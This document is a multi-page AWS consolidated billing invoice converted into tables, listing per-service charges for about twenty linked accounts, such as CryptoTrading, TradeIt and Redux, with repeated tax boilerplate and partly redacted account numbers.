AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| | |
|---|---|
| Crypto Trading Dev 8935) | $0.00 |
| Charges | $0.00 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Adobe Hidden Treasures 5524) | $107.47 |
| Charges | $107.47 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Mystic Logistics 3887) | $307.27 |
| Charges | $307.27 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| TradeIt QA 5523) | $822.95 |
| Charges | $822.95 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CryptoTrading Prod 6117) | $2,994.65 |
| Charges | $2,994.65 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Dakota Funds 7491) | $339.79 |
| Charges | $339.79 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| TradeIt Prod 0246) | $94.85 |
| Charges | $94.85 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Total allocated for this invoice | $11,717.23 |

• There is a $0.03 difference between the sum of all linked account totals and your invoice total. This difference results from rounding of charges that are allocated from the Consolidated Billing account invoice to individual linked accounts.

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| Public Alerts 4769) | $14.35 |
| Charges | $14.35 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 4769 total allocated for this invoice | $14.35 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.06 |
| Charges | $0.06 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $1.16 |
| Charges | $1.16 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $13.13 |
| Charges | $13.13 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| Redux Operations 1517) | $63.68 |
| Charges | $63.68 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 1517 total allocated for this invoice | $63.68 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $3.70 |
| Charges | $3.70 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $14.54 |
| Charges | $14.54 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon ElastiCache | $12.24 |
| Charges | $12.24 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $33.20 |
| Charges | $33.20 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
[redacted]8421

| Summary for Linked Account | |
|---|---|
| CryptoTrading Corp [redacted]9544) | $808.76 |
| Charges | $808.76 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account [redacted]9544 total allocated for this invoice | $808.76 |

| Detail for Linked Account | |
|---|---|
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Storage Service | $1.71 |
| Charges | $1.71 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $32.30 |
| Charges | $32.30 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon DynamoDB | $6.01 |
| Charges | $6.01 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $605.11 |
| Charges | $605.11 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Config | $0.03 |
| Charges | $0.03 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $1.70 |
| Charges | $1.70 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
[redacted]8421

| | |
|---|---|
| AmazonCloudWatch | $147.90 |
| Charges | $147.90 |
| Estimated US sales tax to be collected | $0.00 |
| AWS WAF | $7.13 |
| Charges | $7.13 |
| Estimated US sales tax to be collected | $0.00 |
| AWS CloudTrail | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon CloudFront | $5.87 |
| Charges | $5.87 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $1.00 |
| Charges | $1.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| Waitrainer 3625) | $761.53 |
| Charges | $2,343.07 |
| Credits | ($1,581.54) |
| Estimated US sales tax to be collected | $0.00 |
| Account 3625 total allocated for this invoice | $761.53 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $0.17 |
| Charges | $0.17 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $2.83 |
| Charges | $2.83 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $20.77 |
| Charges | $20.77 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Secrets Manager | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS CloudTrail | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $734.22 |
| Charges | $2,315.76 |
| Credits | ($1,581.54) |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $2.00 |
| Charges | $2.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number

████████ 8421



| | |
|---|---|
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $1.53 |
| Charges | $1.53 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

15

914-015

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| Lebook 4337) | $265.00 |
| Charges | $265.00 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 4337 total allocated for this invoice | $265.00 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $0.13 |
| Charges | $0.13 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.15 |
| Charges | $0.15 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $3.56 |
| Charges | $3.56 |
| Estimated US sales tax to be collected | $0.00 |
| AWS CloudTrail | $0.02 |
| Charges | $0.02 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $261.14 |
| Charges | $261.14 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| Volcanic Star 4212) | $747.98 |
| Charges | $747.98 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 4212 total allocated for this invoice | $747.98 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $70.72 |
| Charges | $70.72 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $144.80 |
| Charges | $144.80 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $16.30 |
| Charges | $16.30 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $511.92 |
| Charges | $511.92 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $4.24 |
| Charges | $4.24 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| Network Redux 8421) | $27.31 |
| Charges | $27.31 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 8421 total allocated for this invoice | $27.31 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $0.88 |
| Charges | $0.88 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.01 |
| Charges | $0.01 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $2.27 |
| Charges | $2.27 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $14.59 |
| Charges | $14.59 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $9.56 |
| Charges | $9.56 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| CryptoTrading Stage 9884) | $1,595.52 |
| Charges | $1,595.52 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 9884 total allocated for this invoice | $1,595.52 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $0.16 |
| Charges | $0.16 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $6.28 |
| Charges | $6.28 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $507.59 |
| Charges | $507.59 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Email Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon DynamoDB | $3.31 |
| Charges | $3.31 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $669.84 |
| Charges | $669.84 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Backup | $0.23 |
| Charges | $0.23 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Amazon Simple Notification Service | $0.00 |
|---|---|
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $0.10 |
| Charges | $0.10 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Container Service for Kubernetes | $144.00 |
| Charges | $144.00 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $203.22 |
| Charges | $203.22 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic File System | $1.36 |
| Charges | $1.36 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon ElastiCache | $48.96 |
| Charges | $48.96 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Queue Service | $10.46 |
| Charges | $10.46 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| Lunar Logic 5858) | $239.63 |
| Charges | $239.63 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 5858 total allocated for this invoice | $239.63 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $5.10 |
| Charges | $5.10 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $14.51 |
| Charges | $14.51 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $4.25 |
| Charges | $4.25 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $215.27 |
| Charges | $215.27 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $0.50 |
| Charges | $0.50 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| TradeIt Corp 9113) | $105.70 |
| Charges | $105.70 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 9113 total allocated for this invoice | $105.70 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $2.05 |
| Charges | $2.05 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $0.19 |
| Charges | $0.19 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $31.46 |
| Charges | $31.46 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Virtual Private Cloud | $71.90 |
| Charges | $71.90 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $0.10 |
| Charges | $0.10 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
[redacted]8421

| Summary for Linked Account | |
|---|---|
| NikeSB [redacted]1775) | $166.03 |
| Charges | $166.03 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account [redacted]1775 total allocated for this invoice | $166.03 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.21 |
| Charges | $0.21 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $0.69 |
| Charges | $0.69 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic File System | $0.04 |
| Charges | $0.04 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $59.93 |
| Charges | $59.93 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $104.16 |
| Charges | $104.16 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $1.00 |
| Charges | $1.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| Adobe Spider Verse 7848) | $320.98 |
| Charges | $320.98 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 7848 total allocated for this invoice | $320.98 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.02 |
| Charges | $0.02 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic File System | $0.06 |
| Charges | $0.06 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $11.10 |
| Charges | $11.10 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $209.60 |
| Charges | $209.60 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon CloudFront | $0.33 |
| Charges | $0.33 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $99.35 |
| Charges | $99.35 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| AWS Backup | $0.01 |
|---|---|
| Charges | $0.01 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $0.50 |
| Charges | $0.50 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| Owen Jones 8246) | $83.75 |
| Charges | $83.75 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 8246 total allocated for this invoice | $83.75 |

| Detail for Linked Account | |
|---|---|
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Storage Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.08 |
| Charges | $0.08 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $15.11 |
| Charges | $15.11 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $67.54 |
| Charges | $67.54 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $1.02 |
| Charges | $1.02 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| Redux Labs ( 7303) | $432.85 |
| Charges | $432.85 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 7303 total allocated for this invoice | $432.85 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $0.01 |
| Charges | $0.01 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $1.62 |
| Charges | $1.62 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $43.82 |
| Charges | $43.82 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Directory Service | $0.19 |
| Charges | $0.19 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon EC2 Container Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $227.13 |
| Charges | $227.13 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon EC2 Container Registry (ECR) | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Service | Amount |
|---|---|
| Amazon Route 53 | $0.21 |
| Charges | $0.21 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Container Service for Kubernetes | $144.00 |
| Charges | $144.00 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $5.54 |
| Charges | $5.54 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic File System | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon ElastiCache | $10.34 |
| Charges | $10.34 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| Redux Bastion 4135) | $7.34 |
| Charges | $7.34 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 4135 total allocated for this invoice | $7.34 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $0.13 |
| Charges | $0.13 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $0.12 |
| Charges | $0.12 |
| Estimated US sales tax to be collected | $0.00 |
| AWS CloudTrail | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $5.09 |
| Charges | $5.09 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon DynamoDB | $0.99 |
| Charges | $0.99 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $1.00 |
| Charges | $1.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Amazon Simple Notification Service | $0.00 |
| --- | --- |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421

| Summary for Linked Account | |
|---|---|
| CryptoTrading QA 7608) | $1,409.84 |
| Charges | $1,409.84 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 7608 total allocated for this invoice | $1,409.84 |

| Detail for Linked Account | |
|---|---|
| Amazon GuardDuty | $21.89 |
| Charges | $21.89 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Storage Service | $1.19 |
| Charges | $1.19 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $5.97 |
| Charges | $5.97 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Email Service | $0.01 |
| Charges | $0.01 |
